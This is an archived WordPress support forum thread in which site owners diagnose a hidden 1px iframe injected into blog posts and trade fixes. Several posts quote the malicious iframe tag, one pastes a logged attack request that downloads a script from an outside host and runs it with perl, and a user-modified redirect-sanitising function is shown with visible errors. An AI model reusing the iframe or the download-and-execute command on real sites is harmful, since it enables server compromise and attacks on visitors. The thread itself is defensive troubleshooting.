WordPress › Support » iframe injection problem?

lostplay
Member
Posted 10 months ago #

Hi,

I've searched around for a resolution to my problem but the closet thread I can find is this: http://wordpress.org/support/topic/89912?replies=4

Basically about a week ago my site began experiencing problems whenever I tried to access the home page >http://www.heroes-hype.com. The screen just freezes for about 10 minutes..sometimes it also throws me out (closes the browser). In the browser footer it displays the following:

waiting for http://xx.xx.xx.xx./iframe/wp-stats.php

(the 'x' is an IP address which I don't recognise)

At first I suspected that it was a problem with the wp-stats plugin which I had just installed prior to this problem surfacing. So I removed the plugin (and other plugins)..I also tried other themes and browsers, but a wee alter and the problem still remains.

So I contacted my host (as one of the threads here suggested I do) and they have reported to me the following:

"Your site was most likely injected with a 1px iframe due to a vulnerability in WordPress -- which is why 2.2.3 was rushed out and pushed out to everyone. A number of sites have the same link which leads one to believe it was due to an exploit in either Wordpress itself or the theme you're using (which has also been called into question as of late)."

So now i'm wondering whether anyone can corroborate that this is the likely reason..and whether they is anything I can do to resolve the problem. I would of course like to upgrade to 2.3 asap, but I doubt this will solve the issue in itself..or will it?

Any advise would be much appreciated.

PS I am using the CSS Freak theme.

whooami
Member
Posted 10 months ago #

what is the xx.xx...

and you say the problem persists, after removing the stats plugin? I dont see the code on your site.

Without seeing the xx.xx.xx.xx.. its hard to say much.

whooami
Member
Posted 10 months ago #

http://61.132.75.71/iframe/wp-stats.php

that? that goes to China, thats prolly not good.

lostplay
Member
Posted 10 months ago #

Hi,

Yes, that's the IP address..

Yep, I removed the wp-stats plugin because I originally assumed it was at fault and because I wanted to ensure that I had covered the basics before asking for advice.

Thanks for the feedback - do you (or anyone else) have any ideas on how to resolve this?

whooami
Member
Posted 10 months ago #

its not on your single post pages .. have you looked inside your theme files? I would start there with looking at index.php

Look inside THIS post:

http://heroes-hype.com/heroes-clues-global-tv-promo

Otto42
Moderator
Posted 10 months ago #

Step 1: Find where the code is being inserted. From what whooami is saying, it's likely inside the content of one specific post. So look through that post and find and remove it.

Step 2: Upgrade to the current latest WordPress version (2.2.3). This has no known security issues at this time.

Step 3: Keep up to date on WordPress releases. On the main dashboard, you'll always see new release information. Also, in WordPress 2.3 and up, WordPress itself will start telling you when your version is out of date and give you info on how to upgrade. So that will be good.

Given that the code is inside a post's content, then I'd say yeah, they likely did it through the exploit in version 2.2. Upgrade to 2.2.3, right now.

lostplay
Member
Posted 10 months ago #

whooami - you're a star! There was the following iframe inside that post:

<iframe src=http://61.132.75.71/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe>

So does this mean they were attempting to track my stats/traffic? Hmm..very nasty stuff. I have now removed it from that post.

Otto42 - thankyou for your help and advice also! I'm going to do as you advice and upgrade asap.

Thanks again, I suspect that you have both saved me hours of stress!

whooami
Member
Posted 10 months ago #

So does this mean they were attempting to track my stats/traffic?

who knows, it would almost be interesting to make up a site that forges a referer thats a wp blog and see if anything can be figured out. I really cant see anyway that they can gleam anything worthwhile.

lostplay
Member
Posted 10 months ago #

Hmm, it's a strange one indeed. Anyway thanks for the headsup :)

Toread
Member
Posted 8 months ago #

Happened today on 2.3.1 site. The injected code was:

<iframe src=http://61.132.75.71/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe>

Inside wp-stats.php is JavaScript code. Host 61.132.75.71 is in China. When can we expect a patch?

scchu
Member
Posted 8 months ago #

Yup. The same thing happened to me. Running 2.3. I thought it must've been exploit for 2.3. But it turns out 2.3.1 is also vulnerable. I am not feeling too comfortable with this actually. And I just noticed it in a post I did 2 days ago!! Now I gotta go back and dig them out... Argh...

daxman
Member
Posted 8 months ago #

Happened to me too.

Columcille
Member
Posted 8 months ago #

Glad to find others discussing this. I've just noticed the same thing turning up in my blog, running v2.3. Was about to update to 2.3.1 but I see from comments on here that it is vulnerable as well.

Any idea what hole these are crawling through?

Columcille
Member
Posted 8 months ago #

Opened a ticket: http://trac.wordpress.org/ticket/5313

dd32
Member
Posted 8 months ago #

Can anyone take a read through their webservers access logs and look for anything suspect accessing the admin pages?
Also check for other users, and change the admin passwords.
It is hard to work out what is happening here without knowing where the problem is coming from.

lloydbudd
Moderator
Posted 8 months ago #

Inserting an iframe of that style is the common injection by at least one black hat seo ring -- I've heard of that injection http://xx.xx.xx.xx./iframe/wp-stats.php being on on a Joomla! site.

Columcille, it's still advisable to upgrade to 2.3.1 as it does address security issues. Including what WP theme, plugins, and other s/w is running on your host will help isolate the vector of the exploit.

Columcille
Member
Posted 8 months ago #

Didn't mean to imply that I was going to delay an update. :) I did update to 1.3.1 but from other comments it seems to have the same problem.

I've just done a little digging in my logs but haven't spotted anything yet. I'll keep looking.

fermuned
Member
Posted 8 months ago #

I suffer the same iframe injection using WP 2.2.2

The iframe code was inserted inside the last post (I think that it could be important) and looking at the server logs nobody accessed to the admin part of WP neither to the single page of the post affected.

The more strange lines of the servers logs are:
1.-GET //wp-pass.php?_wp_http_referer=http://201.37.71.117:8090/tool25.txt?&cmd=cd%20/tmp;rm%20x.txt;wget%20http://201.37.71.117:8090/x.txt;fetch%20http://201.37.71.117:8090/x.txt;lwp-download%20http://201.37.71.1175:8090/x.txt;curl%20-O%20http://201.37.71.117:8090/x.txt;lynx%20http://201.37.71.117:8090/x.txt;perl%20x.txt HTTP/1.1" 302 - "-" "Mozilla/3.0 (compatible; Indy Library)"
2.-"OPTIONS / HTTP/1.1" 200 27903 "-" "Microsoft Data Access Internet Publishing Provider Cache Manager"

aNieto2k
Member
Posted 8 months ago #

I try use this code for inject something into posts, but it's I can't.

I found a no good functionality in redirect, it's possible redirect to another web?

http://youtblog.com?_wp_http_referer=http://www.google.com

Why??

I modify the wp_sanitize_redirect() to do more restrictive the redirection.

function wp_sanitize_redirect($location) {
	$location = preg_replace('|[^a-z0-9-~+_.?#=&;,/:%]|i', '', $location);
	$location = wp_kses_no_null($location);
/* Only redirections into the blog */
if (stristr($location, "http://") && !eregi(get_option("home"),$location)) return get_option("home");</strong>
/* Only redirection into the blog */
	// remove %0d and %0a from location
	$strip = array('%0d', '%0a');
	$found = true;
	while($found) {
		$found = false;
		foreach($strip as $val) {
			while(strpos($location, $val) !== false) {
				$found = true;
				$location = str_replace($val, '', $location);
			}
		}
	}
	return $location;
}

Sorry for my English.

pishmishy
Member
Posted 7 months ago #

If you've been affected by this issue it would be very helpful if you can search through any MySQL logs you have to see if we can pin down where the code was inserted into the database.

See http://trac.wordpress.org/ticket/5313

Mdkart
Member
Posted 7 months ago #

Same problem! Major security issue!

pishmishy
Member
Posted 7 months ago #

Mdkart, do you have any logs that may be useful to us?

voiceofbragg
Member
Posted 7 months ago #

I thing my site got one also, if you see some funky stuff

pishmishy
Member
Posted 7 months ago #

voiceofbragg, do you have logs from MySQL that may help us here?

moshu
Moderator
Posted 7 months ago #

Nope, he's just spamming the forum... [links from his post were deleted]

Mdkart
Member
Posted 7 months ago #

> pishmishy
No mysql logs, I can't access to them on my server :(

laslo
Member
Posted 7 months ago #

I just found some code injected in a post from dec. 6th
http://sintonizando.com/2007/12/06/ulrich-schnauss-elika-y-project-skyward-en-vivo-en-lima/

some spam links hidden by this:

I'm on WP 2.2
Any ideas what to fix, or what to update?

theapparatus
Member
Posted 7 months ago #

Any ideas what to fix, or what to update?

I'd just update the install as you're a few versions behind. It's up to 2.3.1 now.

cbdilger
Member
Posted 7 months ago #

I just found a post with this code injected with WP 2.2.3. I'm upgrading to 2.3.1 now and have contacted my ISP to see if MySQL logs are available. (Edit: no, logs aren't available; darned shared hosting.)

Plugins:
Edit Comments 0.3 beta
Filosofo Comments Preview 0.7
Spam Karma 2 2.2 r3

Theme:
extensively hacked version of kubrick

Urosino
Member
Posted 7 months ago #

Damn, I am having same problem. Just realized this in my source code:

<iframe src=http://www.wp-stats-php.info/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe>

Any solution yet!?

WordPress.org

Forums

iframe injection problem? (92 posts)

Reply »

About this Topic

Tags

Code is Poetry